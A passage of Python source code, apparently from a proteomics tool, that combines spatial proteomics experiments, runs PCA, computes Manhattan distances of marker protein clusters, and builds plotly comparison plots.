# df_distanceOverview_combined["Experiment"] = exp_name
# df_distanceOverview_combined = df_distanceOverview_combined.set_index(["Map", "Cluster", "Experiment"]).unstack(["Cluster"])
#
# elif data_type == "Overview table" and exp_name != list(json_dict.keys())[0]:
# df_distanceOverview_toadd = pd.read_json(json_dict[exp_name][data_type])
# df_distanceOverview_toadd["Experiment"] = exp_name
# df_distanceOverview_toadd = df_distanceOverview_toadd.set_index(["Map", "Cluster", "Experiment"]).unstack(["Cluster"])
# #dataframes will be concatenated, only proteins/Profiles that are in both df will be retained
# df_distanceOverview_combined = pd.concat([df_distanceOverview_combined, df_distanceOverview_toadd])
elif data_type == "Unique Proteins":
unique_proteins_total[exp_name] = json_dict[exp_name][data_type]
elif data_type == "Analysis parameters":
self.analysis_parameters_total[exp_name] = json_dict[exp_name][data_type]
#try:
# for paramters in json_dict[exp_name][data_type].keys():
# if paramters=="acquisition":
# acquisition_loaded.append(json_dict[exp_name][data_type][paramters])
# #elif parameters=="Non valid profiles":
#except:
# continue
#
df_01_combined = df_01_combined.droplevel("join", axis=0)
#filter for consistently quantified proteins (they have to be in all fractions and all maps)
#df_01_filtered_combined = df_01_mean_combined.dropna()
df_01_combined.columns.names = ["Experiment", "Map", "Fraction"]
#reframe it to make it ready for PCA
df_01_filtered_combined = df_01_combined.stack(["Experiment", "Map"]).dropna(axis=0)
#df_01_filtered_combined = df_01_combined.stack(["Experiment"]).dropna(axis=1)
df_01_filtered_combined = df_01_filtered_combined.div(df_01_filtered_combined.sum(axis=1), axis=0)
#df_01_filtered_combined = df_01_combined.copy()
#df_01_filtered_combined.columns.names = ["Experiment", "Fraction", "Map"]
## Replace protein IDs by the unifying protein ID across experiments
#comparison_IDs = pd.Series([split_ids_uniprot(el) for el in df_01_filtered_combined.index.get_level_values("Protein IDs")],
# name="Protein IDs")
#df_01_filtered_combined.index = df_01_filtered_combined.index.droplevel("Protein IDs")
#df_01_filtered_combined.set_index(comparison_IDs, append=True, inplace=True)
##reframe it to make it ready for PCA | dropna: to make sure, that you do consider only fractions that are in all experiments
#df_01_filtered_combined = df_01_filtered_combined.stack(["Experiment", "Map"]).swaplevel(0,1, axis=0).dropna(axis=1)
index_ExpMap = df_01_filtered_combined.index.get_level_values("Experiment")+"_"+df_01_filtered_combined.index.get_level_values("Map")
index_ExpMap.name = "Exp_Map"
df_01_filtered_combined.set_index(index_ExpMap, append=True, inplace=True)
df_distances_combined.columns.names = ["Experiment", "Map"]
series = df_distances_combined.stack(["Experiment", "Map"])
series.name = "distance"
df_distance_comp = series.to_frame()
#fuse Experiment and Map into one column = "Exp_Map"
index_dist_ExpMap = df_distance_comp.index.get_level_values("Experiment")+"_"+df_distance_comp.index.get_level_values("Map")
index_dist_ExpMap.name = "Exp_Map"
df_distance_comp.set_index(index_dist_ExpMap, append=True, inplace=True)
#new
#self.df_distance_comp2 = df_distance_comp.copy()
df_distance_comp.reset_index(level=['Protein IDs'], inplace=True)
df_distance_comp["Protein IDs"] = df_distance_comp["Protein IDs"].str.split(";", expand=True)[0]
df_distance_comp = df_distance_comp.set_index("Protein IDs", append=True).unstack(["Experiment", "Exp_Map", "Map"]).dropna().stack(["Experiment", "Exp_Map", "Map"]).reset_index()
#df_distance_comp.reset_index(inplace=True)
self.unique_proteins_total = unique_proteins_total
self.exp_names = list(df_01_filtered_combined.index.get_level_values("Experiment").unique())
self.exp_map_names = list(index_dist_ExpMap.unique())
self.df_01_filtered_combined = df_01_filtered_combined
#self.df_01_mean_filtered_combined = df_01_mean_filtered_combined
self.df_quantity_pr_pg_combined = df_quantity_pr_pg_combined
self.df_dynamicRange_combined = df_dynamicRange_combined
self.df_distance_comp = df_distance_comp
try:
organism = json_dict[list(json_dict.keys())[0]]["Analysis parameters"]['organism']
except:
organism = "Homo sapiens - Uniprot"
marker_table = pd.read_csv(pkg_resources.resource_stream(__name__, 'annotations/complexes/{}.csv'.format(organism)))
self.markerproteins = {k: v.replace(" ", "").split(",") for k,v in zip(marker_table["Cluster"], marker_table["Members - Gene names"])}
self.clusters_for_ranking = self.markerproteins.keys()
def perform_pca_comparison(self):
"""
PCA will be performed, using logarithmized data.
Args:
self:
df_01_filtered_combined: df, which contains 0/1 normalized data for each map - for all experiments
columns: Fractions, e.g. "03K", "06K", "12K", "24K", "80K"
index: "Protein IDs", "Gene names", "Compartment", "Experiment", "Map", "Exp_Map"
df_01_mean_filtered_combined: df, which contains (global) 0/1 normalized data across all maps (mean) - for all experiments and for all protein IDs,
that are consistent throughout all experiments
columns: Fractions, e.g. "03K", "06K", "12K", "24K", "80K"
index: "Gene names", "Protein IDs", "Compartment", "Experiment"
Returns:
self:
df_pca_for_plotting: PCA processed dataframe
index: "Experiment", "Gene names", "Map", "Exp_Map"
columns: "PC1", "PC2", "PC3"
contains only marker genes, that are consistent throughout all maps / experiments
df_global_pca: PCA processed dataframe
index: "Gene names", "Protein IDs", "Compartment", "Experiment",
columns: "PC1", "PC2", "PC3"
contains all protein IDs, that are consistent throughout all experiments
"""
markerproteins = self.markerproteins.copy()
#df_01_filtered_combined = self.df_01_filtered_combined
#df_01_filtered_combined = self.df_01_filtered_combined
df_mean = pd.DataFrame()
for exp in self.exp_names:
df_exp = self.df_01_filtered_combined.stack("Fraction").unstack(["Experiment", "Map","Exp_Map"])[exp].mean(axis=1).to_frame(name=exp)
df_mean = pd.concat([df_mean, df_exp], axis=1)
df_mean = df_mean.rename_axis("Experiment", axis="columns").stack("Experiment").unstack("Fraction")
pca = PCA(n_components=3)
df_pca = pd.DataFrame(pca.fit_transform(df_mean))
df_pca.columns = ["PC1", "PC2", "PC3"]
df_pca.index = df_mean.index
try:
markerproteins["PSMA subunits"] = [item for sublist in [re.findall("PSMA.*",p) for p in markerproteins["Proteasome"]] for item in sublist]
markerproteins["PSMB subunits"] = [item for sublist in [re.findall("PSMB.*",p) for p in markerproteins["Proteasome"]] for item in sublist]
del markerproteins["Proteasome"]
except:
pass
###only one df, make annotation at that time
df_cluster = pd.DataFrame([(k, i) for k, l in markerproteins.items() for i in l], columns=["Cluster", "Gene names"])
df_global_pca = df_pca.reset_index().merge(df_cluster, how="left", on="Gene names")
df_global_pca.Cluster.replace(np.NaN, "Undefined", inplace=True)
self.markerproteins_splitProteasome = markerproteins
self.df_pca = df_pca
self.df_global_pca = df_global_pca
def plot_pca_comparison(self, cluster_of_interest_comparison="Proteasome", multi_choice=["Exp1", "Exp2"]):
"""
A PCA plot for desired experiments (multi_choice) and 1 desired cluster is generated.
Either the maps for every single experiment are displayed individually or in a combined manner
Args:
self:
markerproteins: dictionary, key: cluster name, value: gene names (e.g. {"Proteasome" : ["PSMA1", "PSMA2",...], ...}
multi_choice: list of experiment names
cluster_of_interest_comparison: string, protein cluster (key in markerproteins, e.g. "Proteasome")
df_pca: PCA processed dataframe
index: "Experiment", "Gene names", "Map", "Exp_Map"
columns: "PC1", "PC2", "PC3"
contains only marker genes, that are consistent throughout all maps / experiments
Returns:
pca_figure: PCA plot for a specified protein cluster.
"""
df_pca = self.df_pca.copy()
markerproteins = self.markerproteins
try:
df_setofproteins_PCA = pd.DataFrame()
for map_or_exp in multi_choice:
for marker in markerproteins[cluster_of_interest_comparison]:
try:
plot_try_pca = df_pca.xs((marker, map_or_exp), level=["Gene names", "Experiment"], drop_level=False)
except KeyError:
continue
df_setofproteins_PCA = df_setofproteins_PCA.append(plot_try_pca)
df_setofproteins_PCA.reset_index(inplace=True)
df_setofproteins_PCA = df_setofproteins_PCA.assign(Experiment_lexicographic_sort=pd.Categorical(df_setofproteins_PCA["Experiment"], categories=multi_choice,
ordered=True))
df_setofproteins_PCA.sort_values("Experiment_lexicographic_sort", inplace=True)
pca_figure = px.scatter_3d(df_setofproteins_PCA,
x="PC1",
y="PC2",
z="PC3",
color="Experiment",
template="simple_white",
hover_data=["Gene names"]
)
pca_figure.update_layout(autosize=False,
width=700,
height=500,
title="PCA plot for <br>the protein cluster: {}".format(cluster_of_interest_comparison),
template="simple_white"
)
return pca_figure
except:
return "This protein cluster was not identified in all experiments"
def plot_global_pca_comparison(self, cluster_of_interest_comparison="Proteasome", x_PCA="PC1", y_PCA="PC3",
markerset_or_cluster=False, multi_choice=["Exp1", "Exp2"]):
""""
PCA plot will be generated
Args:
self:
df_organellarMarkerSet: df, columns: "Gene names", "Compartment", no index
multi_choice: list of experiment names
css_color: list of colors
df_global_pca: PCA processed dataframe
index: "Gene names", "Protein IDs", "Compartment", "Experiment",
columns: "PC1", "PC2", "PC3"
contains all protein IDs, that are consistent throughout all experiments
Returns:
pca_figure: global PCA plot, clusters based on the markerset based (df_organellarMarkerSet) are color coded.
"""
df_global_pca_exp = self.df_global_pca.loc[self.df_global_pca["Experiment"].isin(multi_choice)]
df_global_pca_exp.reset_index(inplace=True)
compartments = list(SpatialDataSet.df_organellarMarkerSet["Compartment"].unique())
compartment_color = dict(zip(compartments, self.css_color))
compartment_color["Selection"] = "black"
compartment_color["undefined"] = "lightgrey"
compartments.insert(0, "undefined")
compartments.insert(len(compartments), "Selection")
cluster = self.markerproteins_splitProteasome.keys()
cluster_color = dict(zip(cluster, self.css_color))
cluster_color["Undefined"] = "lightgrey"
if markerset_or_cluster == True:
df_global_pca = df_global_pca_exp[df_global_pca_exp.Cluster!="Undefined"].sort_values(by="Cluster")
df_global_pca = df_global_pca_exp[df_global_pca_exp.Cluster=="Undefined"].append(df_global_pca)
else:
for i in self.markerproteins[cluster_of_interest_comparison]:
df_global_pca_exp.loc[df_global_pca_exp["Gene names"] == i, "Compartment"] = "Selection"
df_global_pca = df_global_pca_exp.assign(Compartment_lexicographic_sort = pd.Categorical(df_global_pca_exp["Compartment"],
categories=[x for x in compartments],
ordered=True))
df_global_pca.sort_values(["Compartment_lexicographic_sort", "Experiment"], inplace=True)
fig_global_pca = px.scatter(data_frame=df_global_pca,
x=x_PCA,
y=y_PCA,
color="Compartment" if markerset_or_cluster == False else "Cluster",
color_discrete_map=compartment_color if markerset_or_cluster == False else cluster_color,
title="Protein subcellular localization by PCA",
hover_data=["Protein IDs", "Gene names", "Compartment"],
facet_col="Experiment",
facet_col_wrap=2,
opacity=0.9,
template="simple_white"
)
fig_global_pca.update_layout(autosize=False,
width=1800 if markerset_or_cluster == False else 1600,
height=400*(int(len(multi_choice) / 2) + (len(multi_choice) % 2 > 0)),
template="simple_white"
)
return fig_global_pca
def get_marker_proteins(self, experiments, cluster):
df_in = self.df_01_filtered_combined.copy()
markers = self.markerproteins[cluster]
# retrieve marker proteins
df_cluster = pd.DataFrame()
for marker in markers:
try:
df_p = df_in.xs(marker, level="Gene names", axis=0, drop_level=False)
except:
continue
df_cluster = df_cluster.append(df_p)
if len(df_cluster) == 0:
return df_cluster
# filter for all selected experiments
df_cluster = df_cluster.droplevel("Exp_Map", axis=0)
df_cluster = df_cluster.unstack(["Experiment", "Map"])
if any([el not in df_cluster.columns.get_level_values("Experiment") for el in experiments]):
return pd.DataFrame()
drop_experiments = [el for el in df_cluster.columns.get_level_values("Experiment") if el not in experiments]
if len(drop_experiments) > 0:
df_cluster.drop([el for el in df_cluster.columns.get_level_values("Experiment") if el not in experiments],
level="Experiment", axis=1, inplace=True)
df_cluster.dropna(inplace=True)
if len(df_cluster) == 0:
return df_cluster
df_cluster.set_index(pd.Index(np.repeat(cluster, len(df_cluster)), name="Cluster"), append=True, inplace=True)
return df_cluster
def calc_cluster_distances(self, df_cluster, complex_profile=np.median, distance_measure="manhattan"):
df_distances = pd.DataFrame()
# loop over experiments
experiments = set(df_cluster.columns.get_level_values("Experiment"))
for exp in experiments:
df_exp = df_cluster.xs(exp, level="Experiment", axis=1)
ref_profile = pd.DataFrame(df_exp.apply(complex_profile, axis=0, result_type="expand")).T
# loop over maps
maps = set(df_exp.columns.get_level_values("Map"))
for m in maps:
if distance_measure == "manhattan":
d_m = pw.manhattan_distances(df_exp.xs(m, level="Map", axis=1), ref_profile.xs(m, level="Map", axis=1))
else:
raise ValueError(distance_measure)
d_m = pd.DataFrame(d_m, columns=[(exp, m)], index=df_exp.index)
df_distances = pd.concat([df_distances, d_m], axis=1)
df_distances.columns = pd.MultiIndex.from_tuples(df_distances.columns, names=["Experiment", "Map"])
return df_distances
def calc_biological_precision(self, experiments=None, clusters=None):
"""
Method to calculate the distance table for assessing biological precision
"""
df_distances = pd.DataFrame()
if experiments is None:
experiments = self.exp_names
if clusters is None:
clusters = self.markerproteins.keys()
for cluster in clusters:
df_cluster = self.get_marker_proteins(experiments, cluster)
if len(df_cluster) == 0:
continue
dists_cluster = self.calc_cluster_distances(df_cluster)
df_distances = df_distances.append(dists_cluster)
df_distances = df_distances.stack(["Experiment", "Map"]).reset_index()\
.sort_values(["Experiment","Gene names"]).rename({0: "distance"}, axis=1)
df_distances.insert(0, "Exp_Map", ["_".join([e,m]) for e,m in zip(df_distances["Experiment"], df_distances["Map"])])
self.df_distance_comp = df_distances
return df_distances
def get_complex_coverage(self, min_n=5):
full_coverage = {}
for complx in self.markerproteins.keys():
df = self.get_marker_proteins(self.exp_names, complx)
if len(df) >= min_n:
full_coverage[complx] = len(df)
partial_coverage = {}
for exp in self.exp_names:
for complx in self.markerproteins.keys():
if complx in full_coverage.keys():
continue
df = self.get_marker_proteins([exp], complx)
#print(df)
if complx in partial_coverage.keys():
partial_coverage[complx].append(len(df))
else:
partial_coverage[complx] = [len(df)]
no_coverage = {}
for k in partial_coverage.keys():
if all([el < min_n for el in partial_coverage[k]]):
no_coverage[k] = partial_coverage[k]
for k in no_coverage.keys():
del partial_coverage[k]
self.coverage_lists = [full_coverage, partial_coverage, no_coverage]
return full_coverage, partial_coverage, no_coverage
def distance_boxplot_comparison(self, cluster_of_interest_comparison="Proteasome", collapse_maps=False, multi_choice=["Exp1", "Exp2"]):
"""
A box plot for desired experiments (multi_choice) and 1 desired cluster is generated displaying the distribution of the e.g.
Manhattan distance. Either the maps for every single experiment are displayed individually or in a combined manner.
Args:
self:
multi_choice: list of experiment names
collapse_maps: boolean
cluster_of_interest_comparison: string, protein cluster (key in markerproteins, e.g. "Proteasome")
map_names: individual map names are stored as an index
df_distance_comp: df_distance_comp: no index, column names: "Gene names", "Cluster", "Protein IDs", "Compartment", "Experiment", "Map",
"Exp_Map", "distance"
"distance": Manhattan distances for each individual protein of the specified clusters (see self.markerproteins) are stored
Returns:
distance_boxplot_figure: boxplot. Along the x-axis the maps, along the y-axis the distances are shown
"""
#an error massage, if no Experiments are selected, will be displayed already, that is why: return ""
if len(multi_choice)>=1:
pass
else:
return ("")
df_distance_comp = self.df_distance_comp.copy()
#set categroical column, allowing lexicographic sorting
df_distance_comp["Experiment_lexicographic_sort"] = pd.Categorical(df_distance_comp["Experiment"], categories=multi_choice, ordered=True)
df_distance_comp.sort_values(["Experiment_lexicographic_sort", "Map"], inplace=True)
if collapse_maps == False:
#get only values form experiment of interest
df_distance_selectedExp = df_distance_comp.loc[df_distance_comp["Experiment"].isin(multi_choice)]
#get only values form cluster of interest
df_distance_selectedExp = df_distance_selectedExp.loc[df_distance_selectedExp["Cluster"]==cluster_of_interest_comparison]
if df_distance_selectedExp.shape[0] == 0:
self.cache_cluster_quantified = False
else:
individual_distance_boxplot_figure=go.Figure()
for i, exp in enumerate(multi_choice):
df_plot=df_distance_selectedExp[df_distance_selectedExp["Experiment"]==exp]
individual_distance_boxplot_figure.add_trace(go.Box(
x=[df_plot["Experiment"], df_plot["Map"]],
y=df_plot["distance"],
#line=dict(color=pio.templates["simple_white"].layout["colorway"][i]),
boxpoints="all",
whiskerwidth=0.2,
marker_size=2,
name=exp,
hovertext=df_plot["Gene names"]
))
individual_distance_boxplot_figure.update_layout(boxmode="group",
xaxis_tickangle=90,
title="Manhattan distance distribution for <br>the protein cluster: {}".format(cluster_of_interest_comparison),
autosize=False,
width=350*len(multi_choice),
height=500,
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
title="Experiment",
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
title="Distance",
mirror=True),
template="simple_white")
return individual_distance_boxplot_figure
else:
map_or_exp_names = multi_choice
level_of_interest = "Experiment"
boxplot_color = "Experiment"
df_distance_selectedExp_global = df_distance_comp
# "Gene names", "Map", "Cluster" and transferred into the index
df_distance_selectedExp_global.set_index(["Gene names", level_of_interest, "Cluster"], inplace=True)
df_cluster_xmaps_distance_global = pd.DataFrame()
# for each individual map and a defined cluster data will be extracted from the dataframe
# "df_distance_selectedExp_global" and appended to the new dataframe df_cluster_xmaps_distance_global
for map_or_exp in map_or_exp_names:
plot_try = df_distance_selectedExp_global.xs((cluster_of_interest_comparison, map_or_exp), level=["Cluster",
level_of_interest], drop_level=False)
df_cluster_xmaps_distance_global = df_cluster_xmaps_distance_global.append(plot_try)
df_cluster_xmaps_distance_global.sort_values("Experiment_lexicographic_sort", inplace=True)
df_cluster_xmaps_distance_global.reset_index(inplace=True)
distance_boxplot_figure = px.box(df_cluster_xmaps_distance_global,
x=level_of_interest,
y="distance",
points="all",
hover_name="Gene names",
color=boxplot_color,
template="simple_white",
title="Global Manhattan distance distribution for the protein cluster: {}".format(cluster_of_interest_comparison)
)
distance_boxplot_figure.update_layout(autosize=False,
width=250*len(multi_choice),
height=500,
xaxis=go.layout.XAxis(linecolor="black",
linewidth=1,
title="Map",
mirror=True),
yaxis=go.layout.YAxis(linecolor="black",
linewidth=1,
title="distance",
mirror=True),
template="simple_white"
)
return distance_boxplot_figure
def plot_biological_precision(self, multi_choice=None, clusters_for_ranking=None, min_members=5, reference=""):
if multi_choice is None:
multi_choice = self.exp_names
if clusters_for_ranking is None:
clusters_for_ranking = self.clusters_for_ranking
if len(multi_choice) == 0 or len(clusters_for_ranking) == 0:
return("Please provide at least one experiment and one cluster for ranking")
df = self.df_distance_comp.copy()
df = df[df["Experiment"].isin(multi_choice)]
df = df[df["Cluster"].isin(clusters_for_ranking)]
df_m = df.groupby(["Cluster", "Experiment", "Map"]).filter(lambda x: len(x)>=min_members)
df_c = df_m.groupby(["Cluster", "Experiment"]).median().reset_index()
df_m = df_m.groupby(["Cluster", "Experiment", "Map"]).median().reset_index()
df_m = df_m.assign(Experiment_lexicographic_sort = pd.Categorical(df_m["Experiment"], categories=multi_choice, ordered=True))
df_m = df_m.sort_values("Experiment_lexicographic_sort").drop("Experiment_lexicographic_sort", axis=1)\
.groupby("Experiment", as_index=False, group_keys=False, sort=False).apply(lambda x: x.sort_values("distance", ascending=False))
df_c = df_c.assign(Experiment_lexicographic_sort = pd.Categorical(df_c["Experiment"], categories=multi_choice, ordered=True))
df_c = df_c.sort_values("Experiment_lexicographic_sort").drop("Experiment_lexicographic_sort", axis=1)\
.groupby("Experiment", as_index=False, group_keys=False, sort=False).apply(lambda x: x.sort_values("distance", ascending=False))
bp_stacked_bar = px.bar(df_m, x="Experiment", y="distance", color="Cluster", hover_data=["Map"],
width=400+80*len(multi_choice), template="simple_white", height=100+30*len(clusters_for_ranking)).update_layout(legend_traceorder="reversed")
bp_box_minus_min = px.box(df_m.set_index(["Experiment", "Cluster", "Map"]).unstack(["Experiment", "Map"])\
.apply(lambda x: x-x.min(), axis=1).stack(["Experiment", "Map"]).reset_index()\
.sort_values(["Experiment"], key=lambda x: [multi_choice.index(el) for el in x]),
x="Experiment", y="distance", color="Experiment", hover_data=["Cluster", "Map"],
width=200+100*len(multi_choice), template="simple_white", height=400, points="all")\
.update_yaxes(title="distance - cluster offset (minimum)")
bp_box_minus_ref = px.box(df_c.set_index(["Experiment", "Cluster"]).unstack(["Experiment"])\
.apply(lambda x: x/x[("distance", reference)], axis=1).stack(["Experiment"]).reset_index()\
.sort_values(["Experiment"], key=lambda x: [multi_choice.index(el) for el in x])\
.loc[lambda x: x.Experiment != reference],
x="Experiment", y="distance", color="Experiment", hover_data=["Cluster"],
color_discrete_sequence=[px.colors.qualitative.D3[multi_choice.index(el)]
for el in multi_choice if el != reference],
width=200+100*len(multi_choice), template="simple_white", height=400, points="all")\
.update_yaxes(title="distance relative to {}".format(reference))
return bp_stacked_bar, bp_box_minus_min, bp_box_minus_ref
def distance_ranking_barplot_comparison(self, collapse_cluster=False, multi_choice=["Exp1", "Exp2"], clusters_for_ranking=None, ranking_boxPlot="Box plot"):#, toggle_sumORmedian=False):
#ref_exp="Exp1",
if clusters_for_ranking is None:
clusters_for_ranking = self.clusters_for_ranking
#an error massage, if no Experiments are selected, will be displayed already, that is why: return ""
if len(multi_choice)>=1:
pass
else:
return ("")
#dict_cluster_normalizedMedian = {}
#multi_choice = i_multi_choice.value
#clusters_for_ranking = i_clusters_for_ranking.value
df_distance_comp = self.df_distance_comp.copy()
df_distance_comp = df_distance_comp[df_distance_comp["Experiment"].isin(multi_choice)]
df_distance_comp = df_distance_comp[df_distance_comp["Cluster"].isin(clusters_for_ranking)]
df_quantified_cluster = df_distance_comp.reset_index()
df_quantified_cluster = df_distance_comp.drop_duplicates(subset=["Cluster", "Experiment"]).set_index(["Cluster",
"Experiment"])["distance"].unstack("Cluster")
self.df_quantified_cluster = df_quantified_cluster.notnull().replace({True: "x", False: "-"})
dict_quantified_cluster = {}
dict_cluster_normalizedMedian_ref = {}
dict_median_distance_ranking = {}
for cluster in clusters_for_ranking:
try:
df_cluster = df_distance_comp[df_distance_comp["Cluster"]==cluster]
cluster_quantitity = df_cluster["Gene names"].unique().size
if cluster_quantitity>= 5:
dict_quantified_cluster[cluster] = cluster_quantitity
all_median_one_cluster_several_exp = {}
#ref = df_cluster["distance"].median()
for exp in multi_choice:
median = df_cluster[df_cluster["Experiment"]==exp]["distance"].median()
all_median_one_cluster_several_exp[exp] = float(median)
#new
#if exp == ref_exp:
# ref = median
ref = np.median(list(all_median_one_cluster_several_exp.values()))
dict_median_distance_ranking[cluster] = all_median_one_cluster_several_exp
median_ranking_ref = {exp: median/ref for exp, median in all_median_one_cluster_several_exp.items()}
dict_cluster_normalizedMedian_ref[cluster] = median_ranking_ref
else:
continue
except:
continue
self.cluster_above_treshold = dict_quantified_cluster.keys()
self.df_quantified_cluster2 = pd.DataFrame.from_dict({"Number of PG per Cluster":dict_quantified_cluster}).T
df_cluster_normalizedMedian_ref = pd.DataFrame(dict_cluster_normalizedMedian_ref)
df_cluster_normalizedMedian_ref.index.name="Experiment"
df_cluster_normalizedMedian_ref.rename_axis("Cluster", axis=1, inplace=True)
#median makes a huge differnece, improves result of DIA, MQ, libary
df_RelDistanceRanking = pd.concat([df_cluster_normalizedMedian_ref.median(axis=1), df_cluster_normalizedMedian_ref.sem(axis=1)], axis=1,
keys=["Distance Ranking (rel, median)", "SEM"]).reset_index().sort_values("Distance Ranking (rel, median)")
ranking_sum = df_cluster_normalizedMedian_ref.sum(axis=1).round(2)
ranking_sum.name = "Normalized Median - Sum"
df_ranking_sum = ranking_sum.reset_index()
#ranking_product = df_cluster_normalizedMedian.product(axis=1).round(2)
#ranking_product.name = "Normalized Median - Product"
#df_globalRanking = pd.concat([pd.DataFrame(ranking_sum), pd.DataFrame(ranking_product)], axis=1).reset_index()
df_cluster_normalizedMedian_ref = df_cluster_normalizedMedian_ref.stack("Cluster")
df_cluster_normalizedMedian_ref.name="Normalized Median"
df_cluster_normalizedMedian_ref = df_cluster_normalizedMedian_ref.reset_index()
self.df_cluster_normalizedMedian_ref = df_cluster_normalizedMedian_ref
df_cluster_normalizedMedian_ref = df_cluster_normalizedMedian_ref.assign(Experiment_lexicographic_sort = pd.Categorical(df_cluster_normalizedMedian_ref["Experiment"], categories=multi_choice, ordered=True))
df_cluster_normalizedMedian_ref.sort_values("Experiment_lexicographic_sort", inplace=True)
if collapse_cluster == False:
fig_ranking = px.bar(df_cluster_normalizedMedian_ref,
x="Cluster",
y="Normalized Median",
color="Experiment",
barmode="group",
title="Ranking - normalization to reference experiments the median across all experiments for each cluster",
template="simple_white"
)
fig_ranking.update_xaxes(categoryorder="total ascending")
fig_ranking.update_layout(autosize=False,
width=1200 if len(multi_choice)<=3 else 300*len(multi_choice),
height=500,
template="simple_white"
)
return fig_ranking
else:
if ranking_boxPlot == "Bar plot - median":
fig_globalRanking = px.bar(df_RelDistanceRanking.sort_values("Distance Ranking (rel, median)"),
x="Experiment",
y="Distance Ranking (rel, median)",
title="Median manhattan distance distribution for <br>all protein clusters (n>=5 per cluster)",# - median of all individual normalized medians - reference experiment is the median across all experiments for each cluster",
error_x="SEM", error_y="SEM",
color="Experiment",
template="simple_white")
if ranking_boxPlot == "Box plot":
fig_globalRanking = px.box(df_cluster_normalizedMedian_ref,
x="Experiment",
y="Normalized Median",
title="Median manhattan distance distribution for <br>all protein clusters (n>=5 per cluster)",# "Ranking - median of all individual normalized medians - reference is the median across all experiments for each cluster",
color="Experiment",
points="all",
template="simple_white",
hover_name="Cluster")
#return pn.Column(pn.Row(fig_globalRanking), pn.Row(fig_globalRanking2))
else:
fig_globalRanking = px.bar(df_ranking_sum.sort_values("Normalized Median - Sum"),
x="Experiment",
template="simple_white",
y="Normalized Median - Sum",
title="Ranking - median of all individual normalized medians - reference is the median across all experiments for each cluster",
color="Experiment")
fig_globalRanking.update_layout(autosize=False,
width=250*len(multi_choice),
height=500,
template="simple_white"
)
return fig_globalRanking
def quantity_pr_pg_barplot_comparison(self, multi_choice=["Exp1", "Exp2"]):
"""
Barplot, showing number of protein groups/profiles.
Args:
self:
df_quantity_pr_pg_combined: df, no index, column names: "filtering", "type", "number of protein groups", "number of profiles",
"data completeness of profiles", "Experiment"
multi_choice: list of experiment names
Returns:
fig_quantity_pr_pg: barplot, number of protein groups/profiles before/after filtering of the intersection/total quantity
"""
df_quantity_pr_pg_combined = self.df_quantity_pr_pg_combined.copy()
df_quantity_pr_pg_combined = df_quantity_pr_pg_combined[df_quantity_pr_pg_combined["Experiment"].isin(multi_choice)]
df_quantity_pr_pg_combined.insert(0,"Expxfiltering",[" ".join([e,f]) for e,f in zip(
df_quantity_pr_pg_combined.Experiment, df_quantity_pr_pg_combined.filtering)])
df_quantity_pr_pg_combined = df_quantity_pr_pg_combined.assign(
Experiment_lexicographic_sort = pd.Categorical(df_quantity_pr_pg_combined["Experiment"], categories=multi_choice, ordered=True))
df_quantity_pr_pg_combined.sort_values(["Experiment_lexicographic_sort", "type"], ascending=[True, False], inplace=True)
layout = go.Layout(barmode="overlay",
#xaxis_tickangle=90,
autosize=False,
width=100*len(multi_choice)+150,
height=400,
template="simple_white")
filtered = list(np.tile(["id","profile"],len(multi_choice)))
fig_quantity_pg = px.bar(df_quantity_pr_pg_combined, x="Expxfiltering", y="number of protein groups",
color="Experiment", barmode="overlay", hover_data=["type"],
opacity=0.8, color_discrete_sequence=px.colors.qualitative.D3)
fig_quantity_pg.update_layout(layout, title="Number of Protein Groups",
xaxis={"tickmode":"array", "tickvals":[el for el in range(len(multi_choice)*2)],
"ticktext":filtered, "title": {"text": None}})
fig_quantity_pr = px.bar(df_quantity_pr_pg_combined, x="filtering", y="number of profiles",
color="type", barmode="overlay", labels={"Experiment":"", "filtering":""},
facet_col="Experiment",template="simple_white", opacity=1)\
.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
fig_quantity_pr.update_layout(layout, title="Number of Profiles" )
return fig_quantity_pg, fig_quantity_pr
def coverage_comparison(self, multi_choice=["Exp1", "Exp2"]):
"""
Barplot, showing data completeness of profiles.
Args:
self:
df_quantity_pr_pg_combined: df, no index, column names: "filtering", "type", "number of protein groups", "number of profiles",
"data completeness of profiles", "Experiment"
multi_choice: list of experiment names
Returns:
fig_pr_dc: barplot, data completeness of profiles before/after filtering of intersection/total qunatity
"""
df_quantity_pr_pg_combined = self.df_quantity_pr_pg_combined.copy()
df_quantity_pr_pg_combined = df_quantity_pr_pg_combined[df_quantity_pr_pg_combined["Experiment"].isin(multi_choice)].sort_values("filtering")
df_quantity_pr_pg_combined = df_quantity_pr_pg_combined.assign(
Experiment_lexicographic_sort = pd.Categorical(df_quantity_pr_pg_combined["Experiment"],
categories=multi_choice, ordered=True))
#df_quantity_pr_pg_combined.sort_values("Experiment_lexicographic_sort", inplace=True)
df_quantity_pr_pg_combined.sort_values(["Experiment_lexicographic_sort", "filtering"], inplace=True)
fig_pr_dc = px.bar(df_quantity_pr_pg_combined.loc[df_quantity_pr_pg_combined.type=="total"], x="Experiment", y="data completeness of profiles",
color="Experiment", barmode="overlay", hover_data=["filtering"],
template="simple_white", opacity=0.8)
fig_pr_dc.update_layout(#barmode="overlay",
#xaxis_tickangle=90,
title="Profile completeness of all<br>identified protein groups",
autosize=False,
width=100*len(multi_choice)+150,
height=400,
template="simple_white")
return fig_pr_dc
def venn_sections(self, multi_choice_venn=["Exp1"]):
"""
UpsetPlot is created based on list of experiments. If 2/3 experiments are given, the Upsetlot displays all possible
mutually exclusive overlapping combinations of these experiments. Additionally a Venn Diagram is created using matplotlib.
Latter figure has to be transformed from matplotlib object to jpg, to make it available for the webinterface via panel/holoviz.
If more than 3 experiments are given, the UpsetPlot will be calculated only for those combinations of these experiments with at least 300 entries.
Another way to think of this is the mutually exclusive sections of a venn diagram of the sets. If the original list has N sets,
the returned list will have (2**N)-1 sets.
Args:
multi_choice_venn: list of experiment names
self:
unique_proteins_total: dict, key: Experiment name, value: unique protein (groups)
Returns:
im: Venn diagram, made availabe flor plotly/webinterface
figure_UpSetPlot: Upsetplot figure
combinations : list of tuple
tag : str
Binary string representing which sets are included / excluded in
the combination.
set : set
The set formed by the overlapping input sets.
"""
def create_upsetplot(sets, multi_choice):
num_combinations = 2 ** len(sets)
bit_flags = [2 ** n for n in range(len(sets))]
flags_zip_sets = [z for z in zip(bit_flags, sets)]
combo_sets = []
overlapping_ids = []
experiments = []
#dictio = {}
for bits in range(num_combinations - 1, 0, -1):
include_sets = [s for flag, s in flags_zip_sets if bits & flag]
